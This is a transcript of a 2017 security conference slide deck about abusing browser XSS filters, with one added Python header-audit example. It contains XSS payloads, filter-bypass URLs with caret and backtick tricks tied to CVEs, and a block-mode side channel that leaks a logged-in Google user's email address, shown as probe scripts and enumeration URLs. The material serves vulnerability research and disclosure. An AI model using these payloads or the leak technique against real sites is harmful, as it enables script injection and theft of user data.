
USAGE OF XSS FILTER

English version of my presentation at Shibuya.XSS techtalk #9.
Japanese version is here: https://speakerdeck.com/masatokinugawa/shibuya-dot-xss-techtalk-number-9


Masato Kinugawa

April 25, 2017

Transcript

  1. None
  2. None
  3. ❶ ➌ ❷ ❹ Agenda

  4. None
  5. XSS Filter? https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg onload=alert(1)>"> </body> </html>

  6. XSS Filter? https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg #nload=alert#1#>"> </body> </html>

  7. Support https://addons.mozilla.org/ja/firefox/addon/noscript/

  8. How to Control HTTP/1.1 200 OK Date: Tue, 28 Mar 2017 06:16:00 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN

  9. X-XSS-Protection

  10. X-XSS-Protection

  11. How to control NoScript X-XSS-Protection

  12. Basic Behavior https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701 <input value=""><svg #nload=alert#1#>"> <input value=""><svg onload=alert(1)>">

  13. Behavior of block mode

  14. Filter Mechanism of IE/Edge <input value=""><svg #nload=alert#1#>"> <input value="<svg #nload=alert#1#>"> <!-- <svg #nload=alert(1)> --> https://example.com/?q="><svg+onload=alert(1)>

  15. Filter Mechanism of XSS Auditor <input value=""><svg onload=alert(1)>"> <input value="<svg onload=alert(1)>"> <!-- <aaa onload=alert(1)> --> https://example.com/?q="><svg+onload=alert(1)>

  16. Filter Mechanism of NoScript https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701

  17. False Positives and Filter <title>&lt;script&gt; - Google Search</title> <script>(function(){window.google={kEI: [...] https://www.google.co.jp/search?q=<script>

  18. Filter's Risk <script src=//example.jp/jquery.js></script> <script> if(jQuery){ // Expected }else{ // ??? } </script> https://example.com/?<script src=//example.jp/jquery.js></script>

  19. ABUSING FILTER's Replacement Mode

  20. {<a.*?hr{e}f} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}} [...] {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(&#x?0 *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53) |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&#x?0*((67)|(43)|(99)|(63) );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&#x?0*((82)|(52)|(114)|(72));?))([\t]| (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9

    |(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {<BUTTON[ /+\t].*?va{l}ue[ /+\t]*=} {<fo{r}m.*?>} {<OPTION[ /+\t].*?va{l}ue[ /+\t]*=} {<INPUT[ /+\t].*?va{l}ue[ /+\t]*=} [...] {<EM{B}ED[ /+\t].*?((src)|(type)).*?=} {[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.} {<ME{T}A[ /+\t].*?((http-equiv)|(charset))[ /+\t]*=} [...] Filter Regex of IE/Edge "><svg #nload=alert#1#>
  21. Why "><svg #nload=alert#1#> happens [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=. "><svg[SPACE]onload=alert(1)>

  22. Why "><svg #nload=alert#1#> happens "><svg onload=alert(1)> [\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)} x="";alert(1)//"

  23. XSS using XSS filter means:

  24. Past Discoveries https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf http://d.hatena.ne.jp/teracc/20090622

  25. 2015: Rediscoveries https://www.slideshare.net/masatokinugawa/xxn-en

  26. XXN Example [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script> q = "";document#body.innerHTML="<xss>"; </script> URL: ?q=";document.body.innerHTML="<xss>

  27. XXN Example [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script src> <script src="//example.co.jp/test.js" type="text/javascript"> </script> URL: ?"/++.+++=

  28. Mitigation for these attacks mode=block "style=:\ javascript:- vbscript:- vbs:- ",x[]= "{toString: "{valueOf: mode=block

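An added example, not part of the slides: it turns the response header shown on slide 8 and the mode=block mitigation on slide 28 into a check a site owner can run over their own responses, parsing a raw response head and classifying the X-XSS-Protection value. The response text is constructed, modelled on slide 8.

```python
# Added example, not from the slides: audit the X-XSS-Protection header
# of a raw HTTP response and classify which filter mode it selects.
# SAMPLE_RESPONSE is constructed, modelled on the Google response on slide 8.
from typing import Dict

SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Tue, 28 Mar 2017 06:16:00 GMT\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Server: gws\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> Dict[str, str]:
    """Return the header fields of a raw response head, keyed by lowercase name."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def xss_filter_mode(headers: Dict[str, str]) -> str:
    """Classify X-XSS-Protection as 'default', 'off', 'replace' or 'block'.

    'replace' is the rewriting mode (slide 14: onload becomes #nload inside
    the page) that the XXN slides abuse; slide 28 names mode=block as the
    mitigation. 'default' means the header is absent or unrecognised, so the
    browser's built-in setting applies (assumption: both treated alike here).
    """
    value = headers.get("x-xss-protection")
    if value is None:
        return "default"
    parts = [p.strip().lower() for p in value.split(";") if p.strip()]
    if not parts or parts[0] not in ("0", "1"):
        return "default"
    if parts[0] == "0":
        return "off"
    # Remaining directives, e.g. mode=block or report=<uri>
    directives = dict(p.split("=", 1) if "=" in p else (p, "") for p in parts[1:])
    return "block" if directives.get("mode") == "block" else "replace"


if __name__ == "__main__":
    print("X-XSS-Protection mode:", xss_filter_mode(parse_headers(SAMPLE_RESPONSE)))
```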
  29. Strange fix <script src="//example^co.jp/test.js" type="text/javascript"> </script>

  30. ^ is Safe? window#name// The execution is aborted by the syntax error window^name// valid syntax, it is executed as JavaScript window.name <script>

  31. None
  32. XXN using caret (CVE-2016-3212) url=location.search.slice(1); if(url^indexOf(":")!=-1){ url=null; } onload=function(){ if(url){location=url;} }

  33. ES6 and XXN https://example.com/?q=";alert`1`// <script> q = "";alert`1`//"; </script> https://www.slideshare.net/x00mario/es6-en/34 ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else (by Mario Heiderich)

  34. XXN using back-tick characters (CVE-2016-7280) https://example.com/?q=${alert(1)}``//&`+++` https://example.com/?q=[USER_INPUT] <script> foo=``; q="[USER_INPUT]"; </script> <script> foo=`#; q="${alert(1)}#`//"; </script>

  35. Now, is the replacement behavior safe? https://example.com/?+onfiles+++=. <script src="/comm#nfiles/js/important.js" type="text/javascript"> </script> [...]

  36. Future replacement mode https://bugs.chromium.org/p/chromium/issues/detail?id=654794

  37. ABUSING FILTER's Block Mode

  38. Past found bugs in block mode http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html window.length ✨

  39. Getting the filter state https://VICTIM/ https://VICTIM/?<xss> IFRAME ERROR https://ATTACKER/ win=window.open(…) if(win.length == 0){ //when filter works, //the number of frames is "0" }else{ //normal } <script>…</script>

  40. Mitigations in IE/Edge

  41. Abusing block mode in Google https://www.youtube.com/watch?v=IMDWjKFbsJE

  42. Checking Google's Homepage HTTP/1.1 200 OK [...] Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN ✔ ✔ window.length

  43. Special Conditions(1) https://accounts.google.com/ServiceLogin?

  44. Special Conditions(2) google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz google.co.uk google.com.br google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...(

  45. ✨ Bypassing attempts limitation ✨ ✨

  46. Another important thing {<a.*?hr{e}f}

  47. Investigating filter details 0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref> 5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10 <aAAAAAAAAAAhref> https://example.com/

  48. Investigating filter details 0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref> 5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10 <aAAAAAAAAAAhref> <a%XXhref https://example.com/?<a%2Bhref

  49. Investigating filter details 0 <ahr#f> 1 <aAhr#f> 2 <aAAhr#f> 3 <aAAAhr#f> 4 <aAAAAhr#f> 5 <aAAAAAhr#f> 6 <aAAAAAAhr#f> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10 <aAAAAAAAAAAhref> https://example.com/?<a%2Bhref

  50. Result 0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_ A a 0x00 0-9 < B-Z b-z No reaction

  51. Result 0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_ A a 0x00 0-9 < B-Z b-z No reaction

  52. The Target <div class="gb_xb">masatokinugawa@gmail.com</div><div class="gb_pb"> {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

  53. Check Conditions ✔ ✔ ✔ ✔

  54. Organizing URL for attacks <div class="gb_xb">masatokinugawa@gmail.com</div><div class="gb_pb">

  55. Getting the number of characters https://www.google.co.jp/?"-------@gmail.com--div--div-class= https://www.google.co.jp/?"--------@gmail.com--div--div-class= https://www.google.co.jp/?"---------@gmail.com--div--div-class= https://www.google.co.jp/?"----------@gmail.com--div--div-class= https://www.google.co.jp/?"-----------@gmail.com--div--div-class=

    https://www.google.co.jp/?"------------@gmail.com--div--div-class= https://www.google.co.jp/?"-------------@gmail.com--div--div-class= https://www.google.co.jp/?"--------------@gmail.com--div--div-class= https://www.google.co.jp/?"---------------@gmail.com--div--div-class=
  56. Getting the characters https://www.google.de/?"-a-------------@gmail.com--div--div-class= https://www.google.de/?"-b-------------@gmail.com--div--div-class= https://www.google.de/?"-c-------------@gmail.com--div--div-class= https://www.google.de/?"-d-------------@gmail.com--div--div-class= https://www.google.de/?"-e-------------@gmail.com--div--div-class= https://www.google.de/?"-f-------------@gmail.com--div--div-class= https://www.google.de/?"-g-------------@gmail.com--div--div-class=

    https://www.google.de/?"-h-------------@gmail.com--div--div-class= https://www.google.de/?"-i-------------@gmail.com--div--div-class= https://www.google.ru/?"-j-------------@gmail.com--div--div-class= https://www.google.ru/?"-k-------------@gmail.com--div--div-class=
  57. https://www.google.ru/?"-l-------------@gmail.com--div--div-class= https://www.google.ru/?"-m-------------@gmail.com--div--div-class= https://www.google.ru/?"-ma------------@gmail.com--div--div-class= https://www.google.ru/?"-maa-----------@gmail.com--div--div-class= https://www.google.ru/?"-mab-----------@gmail.com--div--div-class= https://www.google.ru/?"-mac-----------@gmail.com--div--div-class= https://www.google.ru/?"-mad-----------@gmail.com--div--div-class= https://www.google.ca/?"-mae-----------@gmail.com--div--div-class= ... Getting

    the characters
  58. ✨ ✨ ✨

  59. After the fix

  60. Microsoft's Fix

  61. PROPER USAGE of XSS FILTER

  62. Recommendation of X-XSS-Protection

  63. 0 is dangerous?

  64. How should we do? X-XSS-Protection

  65. At the last: Rewards

  66. None